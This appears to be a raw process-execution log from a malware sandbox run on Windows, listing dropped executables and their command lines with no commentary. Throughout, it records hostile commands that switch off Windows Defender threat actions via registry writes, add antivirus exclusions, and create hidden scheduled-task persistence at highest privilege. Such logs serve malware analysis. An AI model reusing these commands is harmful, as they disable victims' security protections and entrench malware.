C:\Users\Admin\Desktop\a\setup.exe
"C:\Users\Admin\Desktop\a\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7420 -s 684
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\file300un.exe
"C:\Users\Admin\Desktop\a\file300un.exe"
C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe
"C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\Desktop\a\buildjudit.exe
"C:\Users\Admin\Desktop\a\buildjudit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe
"C:\Users\Admin\Desktop\a\buildjudit.exe"
C:\Users\Admin\Desktop\a\lumma1234.exe
"C:\Users\Admin\Desktop\a\lumma1234.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\Desktop\a\go.exe
"C:\Users\Admin\Desktop\a\go.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\random.exe
"C:\Users\Admin\Desktop\a\random.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Users\Admin\Desktop\a\33333.exe
"C:\Users\Admin\Desktop\a\33333.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe
"C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe"
C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe
"C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe" /s
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe
"C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\Desktop\a\lenin.exe
"C:\Users\Admin\Desktop\a\lenin.exe"
C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe
"C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe"
C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe
"C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5676 -ip 5676
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 272
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Desktop\a\alex.exe
"C:\Users\Admin\Desktop\a\alex.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\well.exe
"C:\Users\Admin\Desktop\a\well.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2316
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.exe" /f & erase "C:\Users\Admin\Desktop\a\mixinte.exe" & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe\" PP /XafdidFSQl 385118 /S" /V1 /F
C:\Users\Admin\Desktop\a\swizzzz.exe
"C:\Users\Admin\Desktop\a\swizzzz.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"
C:\Users\Admin\Desktop\a\sarra.exe
"C:\Users\Admin\Desktop\a\sarra.exe"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte.exe" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9156 -ip 9156
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 1704
C:\Users\Admin\Desktop\a\228.exe
"C:\Users\Admin\Desktop\a\228.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
C:\Users\Admin\Desktop\a\fileosn.exe
"C:\Users\Admin\Desktop\a\fileosn.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\Desktop\a\amers.exe
"C:\Users\Admin\Desktop\a\amers.exe"
C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe PP /XafdidFSQl 385118 /S
C:\Users\Admin\Desktop\a\gold.exe
"C:\Users\Admin\Desktop\a\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\Desktop\a\5.exe
"C:\Users\Admin\Desktop\a\5.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8276 -ip 8276
C:\Users\Admin\Desktop\a\Newoff.exe
"C:\Users\Admin\Desktop\a\Newoff.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 260
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe
C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\Desktop\a\Newoff.exe" /F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
C:\Windows\SysWOW64\schtasks.exe
